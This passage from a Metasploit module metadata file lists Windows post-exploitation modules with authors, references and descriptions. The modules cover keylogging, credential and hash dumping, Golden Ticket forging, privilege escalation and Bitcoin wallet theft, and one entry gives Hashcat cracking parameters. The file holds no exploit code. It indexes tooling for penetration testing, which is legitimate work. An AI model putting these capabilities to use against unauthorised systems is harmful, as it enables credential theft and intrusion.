"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/capture/keylog_recorder.rb",
"is_install_path": true,
"ref_name": "windows/capture/keylog_recorder",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/capture/lockout_keylogger": {
"name": "Windows Capture Winlogon Lockout Credential Keylogger",
"full_name": "post/windows/capture/lockout_keylogger",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"mubix <mubix@hak5.org>",
"cg"
],
"description": "This module migrates and logs Microsoft Windows user's passwords via\n Winlogon.exe using idle time and natural system changes to give a\n false sense of security to the user.",
"references": [
"URL-http://blog.metasploit.com/2010/12/capturing-windows-logons-with.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/capture/lockout_keylogger.rb",
"is_install_path": true,
"ref_name": "windows/capture/lockout_keylogger",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/escalate/droplnk": {
"name": "Windows Escalate SMB Icon LNK Dropper",
"full_name": "post/windows/escalate/droplnk",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"mubix <mubix@hak5.org>"
],
"description": "This module drops a shortcut (LNK file) that has a ICON reference\n existing on the specified remote host, causing SMB and WebDAV\n connections to be initiated from any user that views the shortcut.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/escalate/droplnk.rb",
"is_install_path": true,
"ref_name": "windows/escalate/droplnk",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/escalate/getsystem": {
"name": "Windows Escalate Get System via Administrator",
"full_name": "post/windows/escalate/getsystem",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module uses the builtin 'getsystem' command to escalate\n the current session to the SYSTEM account from an administrator\n user account.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/escalate/getsystem.rb",
"is_install_path": true,
"ref_name": "windows/escalate/getsystem",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/escalate/golden_ticket": {
"name": "Windows Escalate Golden Ticket",
"full_name": "post/windows/escalate/golden_ticket",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Ben Campbell <eat_meatballs@hotmail.co.uk>"
],
"description": "This module will create a Golden Kerberos Ticket using the Mimikatz Kiwi Extension. If no\n options are applied it will attempt to identify the current domain, the domain administrator\n account, the target domain SID, and retrieve the krbtgt NTLM hash from the database. By default\n the well-known Administrator's groups 512, 513, 518, 519, and 520 will be applied to the ticket.",
"references": [
"URL-https://github.com/gentilkiwi/mimikatz/wiki/module-~-kerberos"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-06-27 15:36:41 +0000",
"path": "/modules/post/windows/escalate/golden_ticket.rb",
"is_install_path": true,
"ref_name": "windows/escalate/golden_ticket",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/escalate/ms10_073_kbdlayout": {
"name": "Windows Escalate NtUserLoadKeyboardLayoutEx Privilege Escalation",
"full_name": "post/windows/escalate/ms10_073_kbdlayout",
"rank": 300,
"disclosure_date": "2010-10-12",
"type": "post",
"author": [
"Ruben Santamarta",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits the keyboard layout vulnerability exploited by Stuxnet. When\n processing specially crafted keyboard layout files (DLLs), the Windows kernel fails\n to validate that an array index is within the bounds of the array. By loading\n a specially crafted keyboard layout, an attacker can execute code in Ring 0.",
"references": [
"OSVDB-68552",
"CVE-2010-2743",
"MSB-MS10-073",
"URL-http://www.reversemode.com/index.php?option=com_content&task=view&id=71&Itemid=1",
"EDB-15985"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-01-09 11:12:51 +0000",
"path": "/modules/post/windows/escalate/ms10_073_kbdlayout.rb",
"is_install_path": true,
"ref_name": "windows/escalate/ms10_073_kbdlayout",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/escalate/screen_unlock": {
"name": "Windows Escalate Locked Desktop Unlocker",
"full_name": "post/windows/escalate/screen_unlock",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"L4teral <l4teral[4t]gmail com>",
"Metlstorm"
],
"description": "This module unlocks a locked Windows desktop by patching\n the respective code inside the LSASS.exe process. This\n patching process can result in the target system hanging or\n even rebooting, so be careful when using this module on\n production systems.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/escalate/screen_unlock.rb",
"is_install_path": true,
"ref_name": "windows/escalate/screen_unlock",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/escalate/unmarshal_cmd_exec": {
"name": "Windows unmarshal post exploitation",
"full_name": "post/windows/escalate/unmarshal_cmd_exec",
"rank": 300,
"disclosure_date": "2018-08-05",
"type": "post",
"author": [
"Nicolas Joly",
"Matthias Kaiser",
"Sanjay Gondaliya",
"Pratik Shah <pratik@notsosecure.com>"
],
"description": "This module exploits a local privilege escalation bug which exists\n in microsoft COM for windows when it fails to properly handle serialized objects.",
"references": [
"CVE-2018-0824",
"URL-https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0824",
"URL-https://github.com/x73x61x6ex6ax61x79/UnmarshalPwn",
"EDB-44906"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-10-23 17:15:34 +0000",
"path": "/modules/post/windows/escalate/unmarshal_cmd_exec.rb",
"is_install_path": true,
"ref_name": "windows/escalate/unmarshal_cmd_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/ad_to_sqlite": {
"name": "AD Computer, Group and Recursive User Membership to Local SQLite DB",
"full_name": "post/windows/gather/ad_to_sqlite",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Stuart Morgan <stuart.morgan@mwrinfosecurity.com>"
],
"description": "This module will gather a list of AD groups, identify the users (taking into account recursion)\n and write this to a SQLite database for offline analysis and query using normal SQL syntax.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/ad_to_sqlite.rb",
"is_install_path": true,
"ref_name": "windows/gather/ad_to_sqlite",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/arp_scanner": {
"name": "Windows Gather ARP Scanner",
"full_name": "post/windows/gather/arp_scanner",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>"
],
"description": "This Module will perform an ARP scan for a given IP range through a\n Meterpreter Session.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/arp_scanner.rb",
"is_install_path": true,
"ref_name": "windows/gather/arp_scanner",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/bitcoin_jacker": {
"name": "Windows Gather Bitcoin Wallet",
"full_name": "post/windows/gather/bitcoin_jacker",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"illwill <illwill@illmob.org>",
"todb <todb@metasploit.com>"
],
"description": "This module downloads any Bitcoin wallet files from the target\n system. It currently supports both the classic Satoshi wallet and the\n more recent Armory wallets. Note that Satoshi wallets tend to be\n unencrypted by default, while Armory wallets tend to be encrypted by default.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/bitcoin_jacker.rb",
"is_install_path": true,
"ref_name": "windows/gather/bitcoin_jacker",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/bitlocker_fvek": {
"name": "Bitlocker Master Key (FVEK) Extraction",
"full_name": "post/windows/gather/bitlocker_fvek",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Danil Bazin <danil.bazin@hsc.fr>"
],
"description": "This module enumerates ways to decrypt bitlocker volume and if a recovery key is stored locally\n or can be generated, dump the Bitlocker master key (FVEK)",
"references": [
"URL-https://github.com/libyal/libbde/blob/master/documentation/BitLocker Drive Encryption (BDE) format.asciidoc",
"URL-http://www.hsc.fr/ressources/outils/dislocker/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-01-09 06:32:22 +0000",
"path": "/modules/post/windows/gather/bitlocker_fvek.rb",
"is_install_path": true,
"ref_name": "windows/gather/bitlocker_fvek",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/cachedump": {
"name": "Windows Gather Credential Cache Dump",
"full_name": "post/windows/gather/cachedump",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Maurizio Agazzini <inode@mediaservice.net>",
"mubix <mubix@hak5.org>"
],
"description": "This module uses the registry to extract the stored domain hashes that have been\n cached as a result of a GPO setting. The default setting on Windows is to store\n the last ten successful logins.",
"references": [
"URL-http://lab.mediaservice.net/code/cachedump.rb"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/cachedump.rb",
"is_install_path": true,
"ref_name": "windows/gather/cachedump",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/checkvm": {
"name": "Windows Gather Virtual Environment Detection",
"full_name": "post/windows/gather/checkvm",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>",
"Aaron Soto <aaron_soto@rapid7.com>"
],
"description": "This module attempts to determine whether the system is running\n inside of a virtual environment and if so, which one. This\n module supports detection of Hyper-V, VMWare, Virtual PC,\n VirtualBox, Xen, and QEMU.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-01-17 16:41:21 +0000",
"path": "/modules/post/windows/gather/checkvm.rb",
"is_install_path": true,
"ref_name": "windows/gather/checkvm",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/avira_password": {
"name": "Windows Gather Avira Password Extraction",
"full_name": "post/windows/gather/credentials/avira_password",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Robert Kugler / robertchrk"
],
"description": "This module extracts the weakly hashed password\n which is used to protect a Avira Antivirus (<= 15.0.17.273) installation.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/credentials/avira_password.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/avira_password",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/bulletproof_ftp": {
"name": "Windows Gather BulletProof FTP Client Saved Password Extraction",
"full_name": "post/windows/gather/credentials/bulletproof_ftp",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module extracts information from BulletProof FTP Bookmarks files and store\n retrieved credentials in the database.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/credentials/bulletproof_ftp.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/bulletproof_ftp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/coreftp": {
"name": "Windows Gather CoreFTP Saved Password Extraction",
"full_name": "post/windows/gather/credentials/coreftp",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module extracts saved passwords from the CoreFTP FTP client. These\n passwords are stored in the registry. They are encrypted with AES-128-ECB.\n This module extracts and decrypts these passwords.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/credentials/coreftp.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/coreftp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/credential_collector": {
"name": "Windows Gather Credential Collector",
"full_name": "post/windows/gather/credentials/credential_collector",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"tebo <tebo@attackresearch.com>"
],
"description": "This module harvests credentials found on the host and stores them in the database.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/credentials/credential_collector.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/credential_collector",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/domain_hashdump": {
"name": "Windows Domain Controller Hashdump",
"full_name": "post/windows/gather/credentials/domain_hashdump",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module attempts to copy the NTDS.dit database from a live Domain Controller\n and then parse out all of the User Accounts. It saves all of the captured password\n hashes, including historical ones.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-11-15 14:06:36 +0000",
"path": "/modules/post/windows/gather/credentials/domain_hashdump.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/domain_hashdump",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/dynazip_log": {
"name": "Windows Gather DynaZIP Saved Password Extraction",
"full_name": "post/windows/gather/credentials/dynazip_log",
"rank": 300,
"disclosure_date": "2001-03-27",
"type": "post",
"author": [
"bcoles <bcoles@gmail.com>"
],
"description": "This module extracts clear text credentials from dynazip.log.\n The log file contains passwords used to encrypt compressed zip\n files in Microsoft Plus! 98 and Windows Me.",
"references": [
"CVE-2001-0152",
"MSB-MS01-019",
"PACKETSTORM-24543",
"URL-https://support.microsoft.com/en-us/kb/265131"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/post/windows/gather/credentials/dynazip_log.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/dynazip_log",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/dyndns": {
"name": "Windows Gather DynDNS Client Password Extractor",
"full_name": "post/windows/gather/credentials/dyndns",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Shubham Dawra <shubham2dawra@gmail.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module extracts the username, password, and hosts for DynDNS version 4.1.8.\n This is done by downloading the config.dyndns file from the victim machine, and then\n automatically decode the password field. The original copy of the config file is also\n saved to disk.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/credentials/dyndns.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/dyndns",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/enum_cred_store": {
"name": "Windows Gather Credential Store Enumeration and Decryption Module",
"full_name": "post/windows/gather/credentials/enum_cred_store",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Kx499"
],
"description": "This module will enumerate the Microsoft Credential Store and decrypt the\n credentials. This module can only access credentials created by the user the\n process is running as. It cannot decrypt Domain Network Passwords, but will\n display the username and location.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/credentials/enum_cred_store.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/enum_cred_store",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/enum_laps": {
"name": "Windows Gather Credentials Local Administrator Password Solution",
"full_name": "post/windows/gather/credentials/enum_laps",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Ben Campbell <eat_meatballs@hotmail.co.uk>"
],
"description": "This module will recover the LAPS (Local Administrator Password Solution) passwords,\n configured in Active Directory, which is usually only accessible by privileged users.\n Note that the local administrator account name is not stored in Active Directory,\n so it is assumed to be 'Administrator' by default.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/credentials/enum_laps.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/enum_laps",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/enum_picasa_pwds": {
"name": "Windows Gather Google Picasa Password Extractor",
"full_name": "post/windows/gather/credentials/enum_picasa_pwds",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Unknown",
"Sil3ntDre4m <sil3ntdre4m@gmail.com>"
],
"description": "This module extracts and decrypts the login passwords\n stored by Google Picasa.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/credentials/enum_picasa_pwds.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/enum_picasa_pwds",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/epo_sql": {
"name": "Windows Gather McAfee ePO 4.6 Config SQL Credentials",
"full_name": "post/windows/gather/credentials/epo_sql",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Nathan Einwechter <neinwechter@gmail.com>"
],
"description": "This module extracts connection details and decrypts the saved password for the\n SQL database in use by a McAfee ePO 4.6 server. The passwords are stored in a\n config file. They are encrypted with AES-128-ECB and a static key.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/credentials/epo_sql.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/epo_sql",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/filezilla_server": {
"name": "Windows Gather FileZilla FTP Server Credential Collection",
"full_name": "post/windows/gather/credentials/filezilla_server",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"bannedit <bannedit@metasploit.com>",
"g0tmi1k"
],
"description": "This module will collect credentials from the FileZilla FTP server if installed.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/credentials/filezilla_server.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/filezilla_server",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/flashfxp": {
"name": "Windows Gather FlashFXP Saved Password Extraction",
"full_name": "post/windows/gather/credentials/flashfxp",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module extracts weakly encrypted saved FTP Passwords from FlashFXP. It\n finds saved FTP connections in the Sites.dat file.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-17 16:00:04 +0000",
"path": "/modules/post/windows/gather/credentials/flashfxp.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/flashfxp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/ftpnavigator": {
"name": "Windows Gather FTP Navigator Saved Password Extraction",
"full_name": "post/windows/gather/credentials/ftpnavigator",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module extracts saved passwords from the FTP Navigator FTP client.\n It will decode the saved passwords and store them in the database.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/credentials/ftpnavigator.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/ftpnavigator",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/ftpx": {
"name": "Windows Gather FTP Explorer (FTPX) Credential Extraction",
"full_name": "post/windows/gather/credentials/ftpx",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"bcoles <bcoles@gmail.com>"
],
"description": "This module finds saved login credentials for the FTP Explorer (FTPx)\n FTP client for Windows.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/post/windows/gather/credentials/ftpx.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/ftpx",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/gpp": {
"name": "Windows Gather Group Policy Preference Saved Passwords",
"full_name": "post/windows/gather/credentials/gpp",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Ben Campbell <eat_meatballs@hotmail.co.uk>",
"Loic Jaquemet <loic.jaquemet+msf@gmail.com>",
"scriptmonkey <scriptmonkey@owobble.co.uk>",
"theLightCosine <theLightCosine@metasploit.com>",
"mubix <mubix@hak5.org>"
],
"description": "This module enumerates the victim machine's domain controller and\n connects to it via SMB. It then looks for Group Policy Preference XML\n files containing local user accounts and passwords and decrypts them\n using Microsofts public AES key.\n\n Cached Group Policy files may be found on end-user devices if the group\n policy object is deleted rather than unlinked.\n\n Tested on WinXP SP3 Client and Win2k8 R2 DC.",
"references": [
"URL-http://msdn.microsoft.com/en-us/library/cc232604(v=prot.13)",
"URL-http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html",
"URL-http://blogs.technet.com/grouppolicy/archive/2009/04/22/passwords-in-group-policy-preferences-updated.aspx",
"URL-https://labs.portcullis.co.uk/blog/are-you-considering-using-microsoft-group-policy-preferences-think-again/",
"MSB-MS14-025"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-09-10 15:04:22 +0000",
"path": "/modules/post/windows/gather/credentials/gpp.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/gpp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/heidisql": {
"name": "Windows Gather HeidiSQL Saved Password Extraction",
"full_name": "post/windows/gather/credentials/heidisql",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"h0ng10"
],
"description": "This module extracts saved passwords from the HeidiSQL client. These\n passwords are stored in the registry. They are encrypted with a custom algorithm.\n This module extracts and decrypts these passwords.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/credentials/heidisql.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/heidisql",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/idm": {
"name": "Windows Gather Internet Download Manager (IDM) Password Extractor",
"full_name": "post/windows/gather/credentials/idm",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"sil3ntdre4m <sil3ntdre4m@gmail.com>",
"Unknown"
],
"description": "This module recovers the saved premium download account passwords from\n Internet Download Manager (IDM). These passwords are stored in an encoded\n format in the registry. This module traverses through these registry entries\n and decodes them. Thanks to the template code of theLightCosine's CoreFTP\n password module.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/credentials/idm.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/idm",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/imail": {
"name": "Windows Gather IPSwitch iMail User Data Enumeration",
"full_name": "post/windows/gather/credentials/imail",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module will collect iMail user data such as the username, domain,\n full name, e-mail, and the decoded password. Please note if IMAILUSER is\n specified, the module extracts user data from all the domains found. If\n IMAILDOMAIN is specified, then it will extract all user data under that\n particular category.",
"references": [
"EDB-11331"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/credentials/imail.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/imail",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/imvu": {
"name": "Windows Gather Credentials IMVU Game Client",
"full_name": "post/windows/gather/credentials/imvu",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Shubham Dawra <shubham2dawra@gmail.com>"
],
"description": "This module extracts account username & password from the IMVU game client\n and stores it as loot.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/credentials/imvu.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/imvu",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/mcafee_vse_hashdump": {
"name": "McAfee Virus Scan Enterprise Password Hashes Dump",
"full_name": "post/windows/gather/credentials/mcafee_vse_hashdump",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Mike Manzotti <mike.manzotti@dionach.com>",
"Maurizio inode Agazzini"
],
"description": "This module extracts the password hash from McAfee Virus Scan Enterprise (VSE)\n used to lock down the user interface. Hashcat supports cracking this type of\n hash using hash type sha1($salt.unicode($pass)) (-m 140) and a hex salt\n (--hex-salt) of 01000f000d003300 (unicode \"\\x01\\x0f\\x0d\\x33\"). A dynamic\n format is available for John the Ripper at the referenced URL.",
"references": [
"URL-https://www.dionach.com/blog/disabling-mcafee-on-access-scanning"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/credentials/mcafee_vse_hashdump.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/mcafee_vse_hashdump",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/mdaemon_cred_collector": {
"name": "Windows Gather MDaemonEmailServer Credential Cracking",
"full_name": "post/windows/gather/credentials/mdaemon_cred_collector",
"rank": 600,
"disclosure_date": null,
"type": "post",
"author": [
"Manuel Nader #AgoraSecurity"
],
"description": "Finds and cracks the stored passwords of MDaemon Email Server",
"references": [
"BID-4686"
],
"platform": "Windows",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-08-20 18:24:41 +0000",
"path": "/modules/post/windows/gather/credentials/mdaemon_cred_collector.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/mdaemon_cred_collector",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/meebo": {
"name": "Windows Gather Meebo Password Extractor",
"full_name": "post/windows/gather/credentials/meebo",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Sil3ntDre4m <sil3ntdre4m@gmail.com>",
"Unknown"
],
"description": "This module extracts login account password stored by\n Meebo Notifier, a desktop version of Meebo's Online Messenger.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/credentials/meebo.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/meebo",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/mremote": {
"name": "Windows Gather mRemote Saved Password Extraction",
